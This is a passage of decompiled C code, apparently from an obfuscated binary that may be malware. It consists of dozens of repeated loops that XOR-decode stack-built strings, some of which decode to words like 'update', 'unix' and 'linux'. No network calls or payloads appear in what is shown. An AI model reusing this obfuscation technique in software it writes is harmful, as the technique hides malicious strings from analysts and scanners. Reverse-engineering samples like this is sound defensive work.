                                                                    									_v556 = 0x53;
                                                                    									_v555 = 0x4d;
                                                                    									_v554 = 0x4a;
                                                                    									_v552 = 0x45;
                                                                    									_v550 = 0x24;
                                                                    									_t1041 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1313 - 0x54;
                                                                    										if(_t1313 >= 0x54) {
                                                                    											_t1313 = _t1313 ^ 0x00000018;
                                                                    											__eflags = _t1313;
                                                                    										}
                                                                    										 *(_t1655 + _t1041 + 0x100) =  *(_t1655 + _t1041 + 0x100) ^ 0x00000024;
                                                                    										_t1041 = _t1041 + 1;
                                                                    										__eflags = _t1041 - 7;
                                                                    									} while (_t1041 < 7);
                                                                    									_t1315 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v492 = 0xd;
                                                                    									_v491 = 0x13;
                                                                    									_v490 = 0x14;
                                                                    									_v489 = 0;
                                                                    									_v488 = 0x13;
                                                                    									_v487 = 0xa;
                                                                    									_v486 = 0x7a;
                                                                    									_t1045 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1315 - 0x54;
                                                                    										if(_t1315 >= 0x54) {
                                                                    											_t1315 = _t1315 ^ 0x00000018;
                                                                    											__eflags = _t1315;
                                                                    										}
                                                                    										 *(_t1655 + _t1045 + 0x140) =  *(_t1655 + _t1045 + 0x140) ^ 0x0000007a;
                                                                    										_t1045 = _t1045 + 1;
                                                                    										__eflags = _t1045 - 7;
                                                                    									} while (_t1045 < 7);
                                                                    									_t1317 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v540 = 0xc6;
                                                                    									_v539 = 0xc3;
                                                                    									_v538 = 0xd7;
                                                                    									_v537 = 0xd2;
                                                                    									_v536 = 0xc7;
                                                                    									_v535 = 0xd6;
                                                                    									_v534 = 0xb3;
                                                                    									_t1049 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1317 - 0x54;
                                                                    										if(_t1317 >= 0x54) {
                                                                    											_t1317 = _t1317 ^ 0x00000018;
                                                                    											__eflags = _t1317;
                                                                    										}
                                                                    										 *(_t1655 + _t1049 + 0x110) =  *(_t1655 + _t1049 + 0x110) ^ 0x000000b3;
                                                                    										_t1049 = _t1049 + 1;
                                                                    										__eflags = _t1049 - 7;
                                                                    									} while (_t1049 < 7);
                                                                    									_t1319 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v692 = 0xf3;
                                                                    									_v691 = 0xe8;
                                                                    									_v690 = 0xef;
                                                                    									_v689 = 0xfe;
                                                                    									_v688 = 0x86;
                                                                    									_t1053 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1319 - 0x54;
                                                                    										if(_t1319 >= 0x54) {
                                                                    											_t1319 = _t1319 ^ 0x00000018;
                                                                    											__eflags = _t1319;
                                                                    										}
                                                                    										 *(_t1655 + _t1053 + 0x78) =  *(_t1655 + _t1053 + 0x78) ^ 0x00000086;
                                                                    										_t1053 = _t1053 + 1;
                                                                    										__eflags = _t1053 - 5;
                                                                    									} while (_t1053 < 5);
                                                                    									_t1321 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v508 = 0xce;
                                                                    									_v507 = 0xd8;
                                                                    									_v506 = 0xde;
                                                                    									_v505 = 0xc8;
                                                                    									_v504 = 0xcf;
                                                                    									_v503 = 0xd8;
                                                                    									_v502 = 0xbd;
                                                                    									_t1057 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1321 - 0x54;
                                                                    										if(_t1321 >= 0x54) {
                                                                    											_t1321 = _t1321 ^ 0x00000018;
                                                                    											__eflags = _t1321;
                                                                    										}
                                                                    										 *(_t1655 + _t1057 + 0x130) =  *(_t1655 + _t1057 + 0x130) ^ 0x000000bd;
                                                                    										_t1057 = _t1057 + 1;
                                                                    										__eflags = _t1057 - 7;
                                                                    									} while (_t1057 < 7);
                                                                    									_t1323 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v380 = 4;
                                                                    									_v379 = 0xe;
                                                                    									_v378 = 0x1f;
                                                                    									_v377 = 2;
                                                                    									_v376 = 0x1e;
                                                                    									_v375 = 2;
                                                                    									_v374 = 0xb;
                                                                    									_v373 = 0x19;
                                                                    									_v372 = 0x6d;
                                                                    									_t1061 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1323 - 0x54;
                                                                    										if(_t1323 >= 0x54) {
                                                                    											_t1323 = _t1323 ^ 0x00000018;
                                                                    											__eflags = _t1323;
                                                                    										}
                                                                    										 *(_t1655 + _t1061 + 0x1b0) =  *(_t1655 + _t1061 + 0x1b0) ^ 0x0000006d;
                                                                    										_t1061 = _t1061 + 1;
                                                                    										__eflags = _t1061 - 9;
                                                                    									} while (_t1061 < 9);
                                                                    									_t1325 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v740 = 0xcc;
                                                                    									_v739 = 0xc6;
                                                                    									_v738 = 0xd4;
                                                                    									_v737 = 0xd7;
                                                                    									_v736 = 0xa7;
                                                                    									_t1065 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1325 - 0x54;
                                                                    										if(_t1325 >= 0x54) {
                                                                    											_t1325 = _t1325 ^ 0x00000018;
                                                                    											__eflags = _t1325;
                                                                    										}
                                                                    										 *(_t1655 + _t1065 + 0x48) =  *(_t1655 + _t1065 + 0x48) ^ 0x000000a7;
                                                                    										_t1065 = _t1065 + 1;
                                                                    										__eflags = _t1065 - 5;
                                                                    									} while (_t1065 < 5);
                                                                    									_t1327 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v612 = 0x8d;
                                                                    									_v611 = 0x88;
                                                                    									_v610 = 0x8f;
                                                                    									_v609 = 0x94;
                                                                    									_v608 = 0x99;
                                                                    									_v607 = 0xe1;
                                                                    									_t1069 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1327 - 0x54;
                                                                    										if(_t1327 >= 0x54) {
                                                                    											_t1327 = _t1327 ^ 0x00000018;
                                                                    											__eflags = _t1327;
                                                                    										}
                                                                    										 *(_t1655 + _t1069 + 0xc8) =  *(_t1655 + _t1069 + 0xc8) ^ 0x000000e1;
                                                                    										_t1069 = _t1069 + 1;
                                                                    										__eflags = _t1069 - 6;
                                                                    									} while (_t1069 < 6);
                                                                    									_t1329 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v628 = 0x50;
                                                                    									_v627 = 0x53;
                                                                    									_v626 = 0x5f;
                                                                    									_v625 = 0x5d;
                                                                    									_v624 = 0x50;
                                                                    									_v623 = 0x3c;
                                                                    									_t1073 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1329 - 0x54;
                                                                    										if(_t1329 >= 0x54) {
                                                                    											_t1329 = _t1329 ^ 0x00000018;
                                                                    											__eflags = _t1329;
                                                                    										}
                                                                    										 *(_t1655 + _t1073 + 0xb8) =  *(_t1655 + _t1073 + 0xb8) ^ 0x0000003c;
                                                                    										_t1073 = _t1073 + 1;
                                                                    										__eflags = _t1073 - 6;
                                                                    									} while (_t1073 < 6);
                                                                    									_t1331 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v676 = 0x6d;
                                                                    									_v675 = 0x66;
                                                                    									_v674 = 0x74;
                                                                    									_v673 = 0x70;
                                                                    									_v672 = 3;
                                                                    									_t1077 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1331 - 0x54;
                                                                    										if(_t1331 >= 0x54) {
                                                                    											_t1331 = _t1331 ^ 0x00000018;
                                                                    											__eflags = _t1331;
                                                                    										}
                                                                    										 *(_t1655 + _t1077 + 0x88) =  *(_t1655 + _t1077 + 0x88) ^ 0x00000003;
                                                                    										_t1077 = _t1077 + 1;
                                                                    										__eflags = _t1077 - 5;
                                                                    									} while (_t1077 < 5);
                                                                    									_t1333 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v572 = 0x9e;
                                                                    									_v571 = 0x9f;
                                                                    									_v570 = 0x92;
                                                                    									_v569 = 0x9f;
                                                                    									_v568 = 0x94;
                                                                    									_v567 = 0x89;
                                                                    									_v566 = 0xf0;
                                                                    									_t1081 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1333 - 0x54;
                                                                    										if(_t1333 >= 0x54) {
                                                                    											_t1333 = _t1333 ^ 0x00000018;
                                                                    											__eflags = _t1333;
                                                                    										}
                                                                    										 *(_t1655 + _t1081 + 0xf0) =  *(_t1655 + _t1081 + 0xf0) ^ 0x000000f0;
                                                                    										_t1081 = _t1081 + 1;
                                                                    										__eflags = _t1081 - 7;
                                                                    									} while (_t1081 < 7);
                                                                    									_v659 = 0x77;
                                                                    									_v658 = 0x77;
                                                                    									_t1335 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v660 = 0x76;
                                                                    									_v657 = 0x76;
                                                                    									_v656 = 0x7d;
                                                                    									_v655 = 0x18;
                                                                    									_t1086 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1335 - 0x54;
                                                                    										if(_t1335 >= 0x54) {
                                                                    											_t1335 = _t1335 ^ 0x00000018;
                                                                    											__eflags = _t1335;
                                                                    										}
                                                                    										 *(_t1655 + _t1086 + 0x98) =  *(_t1655 + _t1086 + 0x98) ^ 0x00000018;
                                                                    										_t1086 = _t1086 + 1;
                                                                    										__eflags = _t1086 - 6;
                                                                    									} while (_t1086 < 6);
                                                                    									_t1337 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v388 = 0xf3;
                                                                    									_v387 = 0xf2;
                                                                    									_v386 = 0xef;
                                                                    									_v385 = 0xf8;
                                                                    									_v384 = 0xed;
                                                                    									_v383 = 0xf1;
                                                                    									_v382 = 0xe4;
                                                                    									_v381 = 0x9d;
                                                                    									_t1090 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1337 - 0x54;
                                                                    										if(_t1337 >= 0x54) {
                                                                    											_t1337 = _t1337 ^ 0x00000018;
                                                                    											__eflags = _t1337;
                                                                    										}
                                                                    										 *(_t1655 + _t1090 + 0x1a8) =  *(_t1655 + _t1090 + 0x1a8) ^ 0x0000009d;
                                                                    										_t1090 = _t1090 + 1;
                                                                    										__eflags = _t1090 - 8;
                                                                    									} while (_t1090 < 8);
                                                                    									_t1339 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v436 = 0x8f;
                                                                    									_v435 = 0x9d;
                                                                    									_v434 = 0x91;
                                                                    									_v433 = 0x8c;
                                                                    									_v432 = 0x90;
                                                                    									_v431 = 0x99;
                                                                    									_v430 = 0x8f;
                                                                    									_v429 = 0xfc;
                                                                    									_t1094 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1339 - 0x54;
                                                                    										if(_t1339 >= 0x54) {
                                                                    											_t1339 = _t1339 ^ 0x00000018;
                                                                    											__eflags = _t1339;
                                                                    										}
                                                                    										 *(_t1655 + _t1094 + 0x178) =  *(_t1655 + _t1094 + 0x178) ^ 0x000000fc;
                                                                    										_t1094 = _t1094 + 1;
                                                                    										__eflags = _t1094 - 8;
                                                                    									} while (_t1094 < 8);
                                                                    									_t1341 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v700 = 0xe4;
                                                                    									_v699 = 0xe7;
                                                                    									_v698 = 0xf6;
                                                                    									_v697 = 0xfa;
                                                                    									_v696 = 0x97;
                                                                    									_t1098 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1341 - 0x54;
                                                                    										if(_t1341 >= 0x54) {
                                                                    											_t1341 = _t1341 ^ 0x00000018;
                                                                    											__eflags = _t1341;
                                                                    										}
                                                                    										 *(_t1655 + _t1098 + 0x70) =  *(_t1655 + _t1098 + 0x70) ^ 0x00000097;
                                                                    										_t1098 = _t1098 + 1;
                                                                    										__eflags = _t1098 - 5;
                                                                    									} while (_t1098 < 5);
                                                                    									_t1343 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v564 = 0x8b;
                                                                    									_v563 = 0x8e;
                                                                    									_v562 = 0x9a;
                                                                    									_v561 = 0x9f;
                                                                    									_v560 = 0x8a;
                                                                    									_v559 = 0x9b;
                                                                    									_v558 = 0xfe;
                                                                    									_t1102 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1343 - 0x54;
                                                                    										if(_t1343 >= 0x54) {
                                                                    											_t1343 = _t1343 ^ 0x00000018;
                                                                    											__eflags = _t1343;
                                                                    										}
                                                                    										 *(_t1655 + _t1102 + 0xf8) =  *(_t1655 + _t1102 + 0xf8) ^ 0x000000fe;
                                                                    										_t1102 = _t1102 + 1;
                                                                    										__eflags = _t1102 - 7;
                                                                    									} while (_t1102 < 7);
                                                                    									_t1345 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v716 = 0xd6;
                                                                    									_v715 = 0xf7;
                                                                    									_v714 = 0xe0;
                                                                    									_v713 = 0xe6;
                                                                    									_v712 = 0x96;
                                                                    									_t1106 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1345 - 0x54;
                                                                    										if(_t1345 >= 0x54) {
                                                                    											_t1345 = _t1345 ^ 0x00000018;
                                                                    											__eflags = _t1345;
                                                                    										}
                                                                    										 *(_t1655 + _t1106 + 0x60) =  *(_t1655 + _t1106 + 0x60) ^ 0x00000096;
                                                                    										_t1106 = _t1106 + 1;
                                                                    										__eflags = _t1106 - 5;
                                                                    									} while (_t1106 < 5);
                                                                    									_t1347 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v684 = 0xd5;
                                                                    									_v683 = 0xf3;
                                                                    									_v682 = 0xfa;
                                                                    									_v681 = 0xfa;
                                                                    									_v680 = 0x95;
                                                                    									_t1110 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1347 - 0x54;
                                                                    										if(_t1347 >= 0x54) {
                                                                    											_t1347 = _t1347 ^ 0x00000018;
                                                                    											__eflags = _t1347;
                                                                    										}
                                                                    										 *(_t1655 + _t1110 + 0x80) =  *(_t1655 + _t1110 + 0x80) ^ 0x00000095;
                                                                    										_t1110 = _t1110 + 1;
                                                                    										__eflags = _t1110 - 5;
                                                                    									} while (_t1110 < 5);
                                                                    									_v475 = 0x35;
                                                                    									_v472 = 0x35;
                                                                    									_t1349 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v476 = 0x3a;
                                                                    									_v474 = 0x22;
                                                                    									_v473 = 0x34;
                                                                    									_v471 = 0x3e;
                                                                    									_v470 = 0x1b;
                                                                    									_v469 = 0x5b;
                                                                    									_t1115 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1349 - 0x54;
                                                                    										if(_t1349 >= 0x54) {
                                                                    											_t1349 = _t1349 ^ 0x00000018;
                                                                    											__eflags = _t1349;
                                                                    										}
                                                                    										 *(_t1655 + _t1115 + 0x150) =  *(_t1655 + _t1115 + 0x150) ^ 0x0000005b;
                                                                    										_t1115 = _t1115 + 1;
                                                                    										__eflags = _t1115 - 8;
                                                                    									} while (_t1115 < 8);
                                                                    									_t1351 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v780 = 0x90;
                                                                    									_v779 = 0x81;
                                                                    									_v778 = 0x96;
                                                                    									_v777 = 0xf2;
                                                                    									_t1119 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1351 - 0x54;
                                                                    										if(_t1351 >= 0x54) {
                                                                    											_t1351 = _t1351 ^ 0x00000018;
                                                                    											__eflags = _t1351;
                                                                    										}
                                                                    										 *(_t1655 + _t1119 + 0x20) =  *(_t1655 + _t1119 + 0x20) ^ 0x000000f2;
                                                                    										_t1119 = _t1119 + 1;
                                                                    										__eflags = _t1119 - 4;
                                                                    									} while (_t1119 < 4);
                                                                    									_t1353 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v652 = 0xda;
                                                                    									_v651 = 0xcd;
                                                                    									_v650 = 0xdf;
                                                                    									_v649 = 0xcb;
                                                                    									_v648 = 0xf8;
                                                                    									_v647 = 0xb8;
                                                                    									_t1123 = 0;
                                                                    									do {
                                                                    										__eflags = _t1353 - 0x54;
                                                                    										if(_t1353 >= 0x54) {
                                                                    											_t1353 = _t1353 ^ 0x00000018;
                                                                    											__eflags = _t1353;
                                                                    										}
                                                                    										 *(_t1655 + _t1123 + 0xa0) =  *(_t1655 + _t1123 + 0xa0) ^ 0x000000b8;
                                                                    										_t1123 = _t1123 + 1;
                                                                    										__eflags = _t1123 - 6;
                                                                    									} while (_t1123 < 6);
                                                                    									_t1355 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v636 = 0x42;
                                                                    									_v635 = 0x40;
                                                                    									_v634 = 0x47;
                                                                    									_v633 = 0x44;
                                                                    									_v632 = 0x44;
                                                                    									_v631 = 0x21;
                                                                    									_t1127 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1355 - 0x54;
                                                                    										if(_t1355 >= 0x54) {
                                                                    											_t1355 = _t1355 ^ 0x00000018;
                                                                    											__eflags = _t1355;
                                                                    										}
                                                                    										 *(_t1655 + _t1127 + 0xb0) =  *(_t1655 + _t1127 + 0xb0) ^ 0x00000021;
                                                                    										_t1127 = _t1127 + 1;
                                                                    										__eflags = _t1127 - 6;
                                                                    									} while (_t1127 < 6);
                                                                    									_t1357 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v332 = 0x3e;
                                                                    									_v331 = 0x38;
                                                                    									_v330 = 0x2f;
                                                                    									_v329 = 0x29;
                                                                    									_v328 = 0x34;
                                                                    									_v327 = 0x3b;
                                                                    									_v326 = 0x34;
                                                                    									_v325 = 0x3e;
                                                                    									_v324 = 0x5d;
                                                                    									_t1131 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1357 - 0x54;
                                                                    										if(_t1357 >= 0x54) {
                                                                    											_t1357 = _t1357 ^ 0x00000018;
                                                                    											__eflags = _t1357;
                                                                    										}
                                                                    										 *(_t1655 + _t1131 + 0x1e0) =  *(_t1655 + _t1131 + 0x1e0) ^ 0x0000005d;
                                                                    										_t1131 = _t1131 + 1;
                                                                    										__eflags = _t1131 - 9;
                                                                    									} while (_t1131 < 9);
                                                                    									_v317 = 0xaf;
                                                                    									_v313 = 0xaf;
                                                                    									_t1359 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v320 = 0xb8;
                                                                    									_v319 = 0xb4;
                                                                    									_v318 = 0xb5;
                                                                    									_v316 = 0xa9;
                                                                    									_v315 = 0xba;
                                                                    									_v314 = 0xb8;
                                                                    									_v312 = 0x9b;
                                                                    									_v311 = 0xdb;
                                                                    									_t1136 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1359 - 0x54;
                                                                    										if(_t1359 >= 0x54) {
                                                                    											_t1359 = _t1359 ^ 0x00000018;
                                                                    											__eflags = _t1359;
                                                                    										}
                                                                    										 *(_t1655 + _t1136 + 0x1ec) =  *(_t1655 + _t1136 + 0x1ec) ^ 0x000000db;
                                                                    										_t1136 = _t1136 + 1;
                                                                    										__eflags = _t1136 - 0xa;
                                                                    									} while (_t1136 < 0xa);
                                                                    									_t1361 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v620 = 0xcd;
                                                                    									_v619 = 0xc0;
                                                                    									_v618 = 0xc9;
                                                                    									_v617 = 0xd5;
                                                                    									_v616 = 0xe5;
                                                                    									_v615 = 0xa5;
                                                                    									_t1140 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1361 - 0x54;
                                                                    										if(_t1361 >= 0x54) {
                                                                    											_t1361 = _t1361 ^ 0x00000018;
                                                                    											__eflags = _t1361;
                                                                    										}
                                                                    										 *(_t1655 + _t1140 + 0xc0) =  *(_t1655 + _t1140 + 0xc0) ^ 0x000000a5;
                                                                    										_t1140 = _t1140 + 1;
                                                                    										__eflags = _t1140 - 6;
                                                                    									} while (_t1140 < 6);
                                                                    									_t1363 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v604 = 0x46;
                                                                    									_v603 = 0x41;
                                                                    									_v602 = 0x49;
                                                                    									_v601 = 0x40;
                                                                    									_v600 = 0x6f;
                                                                    									_v599 = 0x2f;
                                                                    									_t1144 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1363 - 0x54;
                                                                    										if(_t1363 >= 0x54) {
                                                                    											_t1363 = _t1363 ^ 0x00000018;
                                                                    											__eflags = _t1363;
                                                                    										}
                                                                    										 *(_t1655 + _t1144 + 0xd0) =  *(_t1655 + _t1144 + 0xd0) ^ 0x0000002f;
                                                                    										_t1144 = _t1144 + 1;
                                                                    										__eflags = _t1144 - 6;
                                                                    									} while (_t1144 < 6);
                                                                    									_t1365 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v588 = 0x79;
                                                                    									_v587 = 0x68;
                                                                    									_v586 = 0x67;
                                                                    									_v585 = 0x6d;
                                                                    									_v584 = 0x68;
                                                                    									_v583 = 9;
                                                                    									_t1148 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1365 - 0x54;
                                                                    										if(_t1365 >= 0x54) {
                                                                    											_t1365 = _t1365 ^ 0x00000018;
                                                                    											__eflags = _t1365;
                                                                    										}
                                                                    										 *(_t1655 + _t1148 + 0xe0) =  *(_t1655 + _t1148 + 0xe0) ^ 0x00000009;
                                                                    										_t1148 = _t1148 + 1;
                                                                    										__eflags = _t1148 - 6;
                                                                    									} while (_t1148 < 6);
                                                                    									_t1367 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v788 = 0xcc;
                                                                    									_v787 = 0xdb;
                                                                    									_v786 = 0xcc;
                                                                    									_v785 = 0xbc;
                                                                    									_t1152 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1367 - 0x54;
                                                                    										if(_t1367 >= 0x54) {
                                                                    											_t1367 = _t1367 ^ 0x00000018;
                                                                    											__eflags = _t1367;
                                                                    										}
                                                                    										 *(_t1655 + _t1152 + 0x18) =  *(_t1655 + _t1152 + 0x18) ^ 0x000000bc;
                                                                    										_t1152 = _t1152 + 1;
                                                                    										__eflags = _t1152 - 4;
                                                                    									} while (_t1152 < 4);
                                                                    									_t1369 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v548 = 0x39;
                                                                    									_v547 = 0x2a;
                                                                    									_v546 = 0x3f;
                                                                    									_v545 = 0x22;
                                                                    									_v544 = 0x25;
                                                                    									_v543 = 0x2c;
                                                                    									_v542 = 0x4b;
                                                                    									_t1156 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1369 - 0x54;
                                                                    										if(_t1369 >= 0x54) {
                                                                    											_t1369 = _t1369 ^ 0x00000018;
                                                                    											__eflags = _t1369;
                                                                    										}
                                                                    										 *(_t1655 + _t1156 + 0x108) =  *(_t1655 + _t1156 + 0x108) ^ 0x0000004b;
                                                                    										_t1156 = _t1156 + 1;
                                                                    										__eflags = _t1156 - 7;
                                                                    									} while (_t1156 < 7);
                                                                    									_t1371 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v764 = 0x62;
                                                                    									_v763 = 0x29;
                                                                    									_v762 = 0x28;
                                                                    									_v761 = 0x39;
                                                                    									_v760 = 0x4c;
                                                                    									_t1160 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1371 - 0x54;
                                                                    										if(_t1371 >= 0x54) {
                                                                    											_t1371 = _t1371 ^ 0x00000018;
                                                                    											__eflags = _t1371;
                                                                    										}
                                                                    										 *(_t1655 + _t1160 + 0x30) =  *(_t1655 + _t1160 + 0x30) ^ 0x0000004c;
                                                                    										_t1160 = _t1160 + 1;
                                                                    										__eflags = _t1160 - 5;
                                                                    									} while (_t1160 < 5);
                                                                    									_t1373 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v732 = 0xb5;
                                                                    									_v731 = 0xfc;
                                                                    									_v730 = 0xf4;
                                                                    									_v729 = 0xed;
                                                                    									_v728 = 0x9b;
                                                                    									_t1164 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1373 - 0x54;
                                                                    										if(_t1373 >= 0x54) {
                                                                    											_t1373 = _t1373 ^ 0x00000018;
                                                                    											__eflags = _t1373;
                                                                    										}
                                                                    										 *(_t1655 + _t1164 + 0x50) =  *(_t1655 + _t1164 + 0x50) ^ 0x0000009b;
                                                                    										_t1164 = _t1164 + 1;
                                                                    										__eflags = _t1164 - 5;
                                                                    									} while (_t1164 < 5);
                                                                    									_t1375 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v724 = 0x2c;
                                                                    									_v723 = 0x6f;
                                                                    									_v722 = 0x6b;
                                                                    									_v721 = 0x6e;
                                                                    									_v720 = 2;
                                                                    									_t1168 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1375 - 0x54;
                                                                    										if(_t1375 >= 0x54) {
                                                                    											_t1375 = _t1375 ^ 0x00000018;
                                                                    											__eflags = _t1375;
                                                                    										}
                                                                    										 *(_t1655 + _t1168 + 0x58) =  *(_t1655 + _t1168 + 0x58) ^ 0x00000002;
                                                                    										_t1168 = _t1168 + 1;
                                                                    										__eflags = _t1168 - 5;
                                                                    									} while (_t1168 < 5);
                                                                    									_t1377 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v344 = 0xdf;
                                                                    									_v343 = 0xd8;
                                                                    									_v342 = 0xcf;
                                                                    									_v341 = 0xd6;
                                                                    									_v340 = 0xd8;
                                                                    									_v339 = 0xd1;
                                                                    									_v338 = 0xd8;
                                                                    									_v337 = 0xc4;
                                                                    									_v336 = 0xbd;
                                                                    									_t1172 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1377 - 0x54;
                                                                    										if(_t1377 >= 0x54) {
                                                                    											_t1377 = _t1377 ^ 0x00000018;
                                                                    											__eflags = _t1377;
                                                                    										}
                                                                    										 *(_t1655 + _t1172 + 0x1d4) =  *(_t1655 + _t1172 + 0x1d4) ^ 0x000000bd;
                                                                    										_t1172 = _t1172 + 1;
                                                                    										__eflags = _t1172 - 9;
                                                                    									} while (_t1172 < 9);
                                                                    									_t1379 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v396 = 0x48;
                                                                    									_v395 = 0x44;
                                                                    									_v394 = 0x45;
                                                                    									_v393 = 0x5f;
                                                                    									_v392 = 0x4a;
                                                                    									_v391 = 0x48;
                                                                    									_v390 = 0x5f;
                                                                    									_v389 = 0x2b;
                                                                    									_t1176 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1379 - 0x54;
                                                                    										if(_t1379 >= 0x54) {
                                                                    											_t1379 = _t1379 ^ 0x00000018;
                                                                    											__eflags = _t1379;
                                                                    										}
                                                                    										 *(_t1655 + _t1176 + 0x1a0) =  *(_t1655 + _t1176 + 0x1a0) ^ 0x0000002b;
                                                                    										_t1176 = _t1176 + 1;
                                                                    										__eflags = _t1176 - 8;
                                                                    									} while (_t1176 < 8);
                                                                    									_v412 = 0xb9;
                                                                    									_v406 = 0xb9;
                                                                    									_t1381 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v411 = 0xa4;
                                                                    									_v410 = 0xbd;
                                                                    									_v409 = 0xb1;
                                                                    									_v408 = 0xac;
                                                                    									_v407 = 0xb0;
                                                                    									_v405 = 0xdc;
                                                                    									_t1181 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1381 - 0x54;
                                                                    										if(_t1381 >= 0x54) {
                                                                    											_t1381 = _t1381 ^ 0x00000018;
                                                                    											__eflags = _t1381;
                                                                    										}
